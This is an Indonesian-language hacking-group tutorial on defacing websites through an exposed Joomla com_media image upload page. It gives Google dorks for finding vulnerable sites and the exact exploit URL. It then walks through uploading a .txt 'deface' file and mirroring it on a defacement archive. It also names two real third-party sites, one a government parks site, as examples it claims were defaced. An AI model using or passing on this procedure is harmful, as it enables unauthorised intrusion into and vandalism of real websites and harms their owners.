DEFACE COM_MEDIA

G HAXOR TEAM

Hae bre
   Bertemu lagi dengan w Anonimokerl. Kali ini W bakal share cara deface tehnik com_media. Tehnik ini tehnik upload file yang cuma bisa upload file ext .txt, tapi tenang aja bisa di mirror di defacer.id kok :)

Langsung saja ke bahan-bahannya :
1. Dork :
   - inurl:index.php?option=com_media (harus pake exploit)
   - inurl:com_media intitle:insert image intext:maximum ( dork tanpa exploit )
2. Exploit :
   - index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Script txt

Caranya :
Search salah satu dork di browser :v

Lalu klik salah satu site :v
Kalo lu pake dork pertama, lu harus tambahkan exploitnya dibelakang com.
Contoh
http://site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Kalo vuln maka tampilannya akan seperti ini

Lalu lu tekan choose file dibawah dan pilih script txt lu :v tekan deh tombol upload :v kalo berhasil akan muncul tulisan berwarna hijau kalo gagal akan ada tulisan failed upload (warna merah)

Kalo berhasil lu panggil aja scriptnya.
Caranya tambahkan exploit /images/namafile.txt dibelakang site contohnya:
http://site.com/images/anonimokerl.txt
Lalu search deh :b

Ini adalah beberapa contoh hasil defacenya :v
http://www.tanzaniaparks.go.tz/images/anonim.txt
https://www.pdapanache.com/images/anonim.txt

OKEY :V THANKS YA :V